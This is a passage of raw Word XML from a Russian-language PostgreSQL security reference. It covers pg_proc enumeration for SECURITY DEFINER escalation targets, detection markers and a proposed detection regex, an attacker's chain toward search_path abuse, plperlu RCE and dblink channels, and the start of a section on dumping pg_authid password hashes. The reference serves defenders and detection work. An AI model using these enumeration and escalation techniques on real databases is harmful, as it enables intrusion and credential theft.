        <w:t xml:space="preserve">•   Маркер в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_activity.query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT ... FROM pg_proc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + JOIN на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_namespace</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_language</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + фильтр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosecdef = true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — паттерн именно поиска целей для эскалации, легитимный код этой комбинации не делает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175C93EF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   В </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после нормализации — нормализованная форма </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT $1, p.oid::int, ... FROM pg_proc p ... WHERE p.prosecdef = $N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — характерный отпечаток recon-payload-а (Payload A).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A3FBDC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_get_functiondef()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в логах от не-DBA роли — атака; функция используется при </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_dump --schema-only</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и в IDE-плагинах для DBA, для application — нет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F01FE11" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7C8F2B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Работает на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 14–17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без изменений. Структура </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> стабильна с 7.x; основные колонки совместимы между мажорами.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778D38EA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_get_functiondef()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> доступны PUBLIC на AWS RDS / Google Cloud SQL / Supabase — провайдеры не ограничивают каталог по тем же причинам, что и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (сломает ORM). На managed-инстансах в выборку попадают служебные функции провайдера (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rds_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cloudsql.*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>supabase_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — это, как и в 3.8.1, fingerprint самого провайдера. SECURITY DEFINER функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-owner на </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">managed обычно сводятся к стандартным extension-функциям (pgcrypto, pg_stat_statements) — реальных кастомных SECURITY DEFINER-целей для эскалации на managed мало, потому что admin-операции делает сам провайдер вне SQL. Детально по провайдерам — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.9</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCD501B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0287199E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_attribute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для разведки таблиц и колонок; обычно атакующий идёт 3.8.4 → 3.8.1 → 3.8.2 → 3.13 (эскалация).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EE74FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — SECURITY DEFINER + SET search_path: основная цепочка эксплуатации того, что нашлось через Payload A. После </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE prosecdef = true AND owner=postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> атакующий ищет в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosrc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Payload B) функции без явного </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET search_path = pg_catalog, pg_temp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это уязвимый паттерн.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0A659A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Identifier injection в plpgsql. Найденные через Payload B </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE format('%s', ...)</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE '...' || ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> внутри plpgsql-функций — прямой путь к 3.16.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE89A11" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.2, 3.7.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — plperlu/plpython3u RCE. Список доступных языков (Payload A с JOIN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_language</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) определяет, доступны ли эти векторы. Если в кластере нет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plperlu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE l.lanname = 'plperlu'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> возвращает пусто) — 3.7.2 не применим без установки расширения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096B3ED8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.1, 3.6.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — поиск extension-функций (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE p.proname LIKE 'dblink%' OR p.proname LIKE 'postgres_fdw%'</w:t>
      </w:r>
      <w:r>
        <w:t>) для определения, какие OOB-каналы из 3.6 доступны в кластере.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72568E93" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rules.py в DS-workshop2.0 — не покрыто:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> детектора чтения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_get_functiondef</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нет. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Рекомендация:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> добавить в тот же regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>METADATA_RECON</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (предложенный в 3.8.1) ветку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc|pg_get_functiondef|pg_get_function_arguments</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Сводный regex для всей категории 3.8 — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>summary-3.8.md</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA8A0C0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492BCFA0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: System Catalogs — pg_proc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C8F9EE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: System Information Functions — pg_get_functiondef / pg_get_function_arguments / pg_get_userbyid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2928D9E8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Object Identifier Types — regprocedure / regproc / regrole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3C66D6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: CREATE FUNCTION — SECURITY DEFINER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B41D324" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PortSwigger Web Security Academy: SQL injection cheat sheet — PostgreSQL (function enumeration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574DFD25" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HackTricks: PostgreSQL Injection — pg_proc &amp; function enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F55206" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.8.3 pg_authid и pg_shadow — хеши паролей (superuser-only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F58AB5D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog.pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — единая таблица всех ролей кластера (распространяется через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_global</w:t>
      </w:r>
      <w:r>
        <w:t>, общая для всех БД). Содержит флаги привилегий (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rolsuper</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rolcreaterole</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rolbypassrls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rolreplication</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>колонку `rolpassword`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с хешем пароля. SELECT на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ограничен SUPERUSER-ом (и предопределённой ролью </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_all_data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с PG 14+). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog.pg_shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — view поверх </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с фильтром </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rolcanlogin = true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, тоже SUPERUSER-only. Для пост-эксплуатации после получения superuser-а (см. 3.13) — Payload B дампит все хеши кластера за один UNION. До получения superuser-а доступно только содержимое </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_roles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — view, где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rolpassword</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> всегда замаскирован как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>********</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B2D9F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035FAD26" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/v1/admin.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08823FEF"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07DB5EFD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
